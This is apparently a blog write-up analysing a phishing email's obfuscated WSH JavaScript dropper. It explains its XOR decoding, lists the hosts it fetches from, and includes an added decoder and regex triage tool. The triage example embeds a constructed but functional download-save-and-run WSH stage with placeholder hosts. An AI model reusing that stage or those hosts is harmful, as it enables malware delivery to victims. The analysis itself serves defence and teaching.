Phishing mails and their "obfuscated" code
PLEASE DO NOT TRY THIS UNLESS YOU KNOW WHAT YOU ARE DOING.
I usually receive a lot of phishing, and sometimes I get a mail with a zip file attached.
After running that zip through the antivirus, I opened it and found these 2 files:
Now the .txt file tells you to double-click the .js, which is a WSH (Windows Script Host) script and is what we are going to "reverse".
Ok, so this is the .js file.
Now it looks like a mess... or maybe not?
If you look closely you'll see something interesting:
There are 2 vars: a long one which looks like a key, then an even longer one which looks like an encrypted message.
After that there is a for loop and what looks like an XOR operation:
XOR with a repeating key is the simplest (and weakest) cipher there is, and we have something at the start that looks like a key, so let's clean the code!
To do that, I simply use the search and replace function in Notepad++ (most text editors have this function).
Before executing that, just a few notes:
- I changed the code a little to make it more understandable, since there was a long inline expression.
- As you can see, it takes enc_data and XORs it with the key char by char; when the index i reaches the length of the key it is reset to zero (which is just the modulo operation with the length of the key string).
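The decoding loop described in the notes above, written as a stand-alone Node.js example. This is added code, not the script's own: the key and ciphertext are constructed here (XOR is symmetric, so a harmless "second stage" is encoded with the same function to produce something to decode), and the enc_data is assumed to be an ordinary JS string. The result is printed, never passed to eval, which is the whole point of cleaning the code by hand.

```javascript
// Added example: repeating-key XOR decoder of the kind used by the phishing
// dropper. SAMPLE_KEY and SAMPLE_STAGE are constructed for this illustration;
// they are NOT the values from the real sample.

// Decode encData with key, one character at a time, resetting the key index
// to zero when it reaches key.length (the "wrap" the original loop does).
function xorDecodeWrap(encData, key) {
  if (!key) throw new Error("empty key");
  let out = "";
  let i = 0;
  for (let j = 0; j < encData.length; j++) {
    out += String.fromCharCode(encData.charCodeAt(j) ^ key.charCodeAt(i));
    i++;
    if (i === key.length) i = 0;
  }
  return out;
}

// The same operation written with the modulo operator; the two are equivalent,
// which is what the note about "the modulo operation" means.
function xorDecodeMod(encData, key) {
  if (!key) throw new Error("empty key");
  let out = "";
  for (let j = 0; j < encData.length; j++) {
    out += String.fromCharCode(encData.charCodeAt(j) ^ key.charCodeAt(j % key.length));
  }
  return out;
}

// Constructed key and harmless stage; encoding the stage with the same XOR
// gives a ciphertext to decode.
const SAMPLE_KEY = "kjH7nqP2"; // constructed, not from the sample
const SAMPLE_STAGE = 'var d = new Date(); WScript.Echo("second stage");';
const SAMPLE_ENC = xorDecodeMod(SAMPLE_STAGE, SAMPLE_KEY);

function main() {
  // Print the decoded stage instead of eval'ing it: read it, don't run it.
  const decoded = xorDecodeWrap(SAMPLE_ENC, SAMPLE_KEY);
  console.log(decoded);
  return decoded;
}

main();
```

When you do this against a real sample, replace the final eval (or whatever executes the decoded string) with the print, and keep the rest of the loop exactly as the malware wrote it; any "cleanup" that changes the arithmetic will give you garbage.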
So this is the output of that console.log():
Let's do some more cleanup because it looks messy, but as you can see this is already readable.
Ok, this is quite simple:
- There is a value which I suppose is a date (because I received the mail on the 7th of October and the language of the mail was Italian).
- Then a declaration of a function which is called 2 times at the end of the code.
- Inside the function there is an encrypted list (it's a list because there is a .split() at the end of the string, a method that returns an array of strings).
- It checks whether arg is empty or not and sets the extension name, which will be used later.
- There is a for loop which does some stuff for each element of enc_list.
- At the end, the function is called 2 times (you'll understand why later).
- It allocates a Windows Script Shell object, then composes a disk location (I called the variable where), which will be filled with something like C:\Users\<username>\AppData\Local\Temp\<random number><extension>, where username is the name of the current user and extension is the file extension (".exe" or ".pdf").
- It initializes the variable ok to false.
- It initializes an XHR object (which is used to download a file from the web).
- It tells the XHR object that once the data has been downloaded it should be written to the file C:\Users\<username>\AppData\Local\Temp\<random number><extension> and then executed.
- Then it decrypts the enc_list entries one by one and, once decrypted, concatenates some strings to make a URL and tries to download the file.
- If the download doesn't fail it stops the loop; otherwise it moves on to the next list entry and tries again.
Decrypted, the list gives these hosts:
ENTHELP.COM www.SMOKEDMEATSANDMORE.COM ERVINSOLAR.NET DIGITALCONTACT.COM/wp-content/themes/optimizePressTheme INNOXFUSTA.COM MAXMSP.ORG/wp-content/uploads www.DADSONASSOCIATES.COM
which I expect to be compromised websites where they uploaded their stuff (i.e. those files plus probably other things).
If you clean up all the code, removing all the obfuscation, you'll get the original code:
Now I'll explain the purpose of this "mess", if it isn't clear yet:
What it does is decrypt its internal data and download 2 files from one of those hosts: an EXE and a PDF, which are fetched and executed by calling download_data("") (which fetches the exe) and download_data("&pdf=FhbanGAKJrjHEGz") (which fetches the pdf).
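You don't need to run a stage like this to confirm what it is about to do: once it is decoded, the objects it creates give it away. As an added example (not the author's code and not the real sample), here is a small Node.js triage function run over a constructed stage that mirrors the behaviour described above. The WScript.Shell and MSXML2.XMLHTTP ProgIDs are the standard Windows ones behind the "Windows Script Shell object" and "XHR object" in the write-up; ADODB.Stream is an assumption, the usual way a WSH script writes downloaded bytes to disk, since the page doesn't say how the file is written. The host list and URL pieces in the sample are placeholders.

```javascript
// Added example: static triage of a deobfuscated WSH dropper stage.
// SAMPLE_STAGE is CONSTRUCTED to mirror the behaviour the write-up describes
// (shell object, %TEMP% path with a random name, XHR download, write, Run);
// it is not the real sample and its hosts/URL pieces are placeholders.

// Each indicator is one thing a downloader needs. ProgIDs are the standard
// Windows ones; ADODB.Stream is assumed (the page does not say how the
// downloaded bytes reach the disk). No /g flag, so .test() is stateless.
const INDICATORS = [
  { name: "shell_object",  re: /ActiveXObject\(\s*["']WScript\.Shell["']/i },
  { name: "xhr_object",    re: /ActiveXObject\(\s*["'](?:MSXML2\.XMLHTTP|Microsoft\.XMLHTTP)/i },
  { name: "file_stream",   re: /ActiveXObject\(\s*["']ADODB\.Stream["']/i },
  { name: "temp_path",     re: /%TEMP%|ExpandEnvironmentStrings|\\AppData\\Local\\Temp/i },
  { name: "random_name",   re: /Math\.random\s*\(/ },
  { name: "runs_file",     re: /\.Run\s*\(/ },
  { name: "exe_extension", re: /["']\.exe["']/i },
  { name: "split_list",    re: /["'][^"'\n]{40,}["']\s*\.split\s*\(/ },
];

// String literals of 40+ characters: in a dropper these are normally the
// encoded payload or host list still waiting to be decoded.
const BLOB_RE = /"([^"\\\n]{40,})"|'([^'\\\n]{40,})'/g;

function extractBlobs(source) {
  const blobs = [];
  for (const m of source.matchAll(BLOB_RE)) blobs.push(m[1] !== undefined ? m[1] : m[2]);
  return blobs;
}

function triageWsh(source) {
  const hits = INDICATORS.filter((ind) => ind.re.test(source)).map((ind) => ind.name);
  // Rough heuristic: network + disk + execution together is what makes a
  // dropper; four or more indicators is a strong sign of one.
  const verdict = hits.length >= 4 ? "likely dropper" : "inconclusive";
  return { hits, blobs: extractBlobs(source), verdict };
}

// Constructed mock of the decoded second stage (placeholder tokens, fake path).
const SAMPLE_STAGE = `
function download_data(arg) {
  var enc_list = "aGVscA|d29ybGQ|ZXg|bXNn|cGRm|aHR0cA|d3d3|c2l0ZQ|ZG9j|emlw".split("|");
  var ext = (arg === "") ? ".exe" : ".pdf";
  var sh = new ActiveXObject("WScript.Shell");
  var where = sh.ExpandEnvironmentStrings("%TEMP%") + "\\\\" + Math.round(Math.random() * 100000) + ext;
  var ok = false;
  var xhr = new ActiveXObject("MSXML2.XMLHTTP");
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4 && xhr.status === 200) {
      var st = new ActiveXObject("ADODB.Stream");
      st.Type = 1; st.Open(); st.Write(xhr.responseBody); st.SaveToFile(where, 2); st.Close();
      sh.Run(where, 1, false);
      ok = true;
    }
  };
  for (var i = 0; i < enc_list.length && !ok; i++) {
    try { xhr.open("GET", "http://" + enc_list[i] + "/placeholder" + arg, false); xhr.send(); } catch (e) {}
  }
}
download_data("");
download_data("&pdf=PLACEHOLDER");
`;

function main() {
  const report = triageWsh(SAMPLE_STAGE);
  console.log(JSON.stringify(report, null, 2));
  return report;
}

main();
```

The blobs it pulls out are exactly what you feed to the XOR decoder next; the indicator list is a triage aid for reading, not an antivirus, and a stage that builds its ProgID strings at runtime will slip past the regexes.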
Now, I do not know what those files are, because I haven't executed that script; I can assume they are harmful programs (since this comes from a phishing mail).
So always be aware of what you are going to execute, because it can be really harmful, like this WSH file.
If you do not know what you downloaded, delete it! Do not trust what you do not know.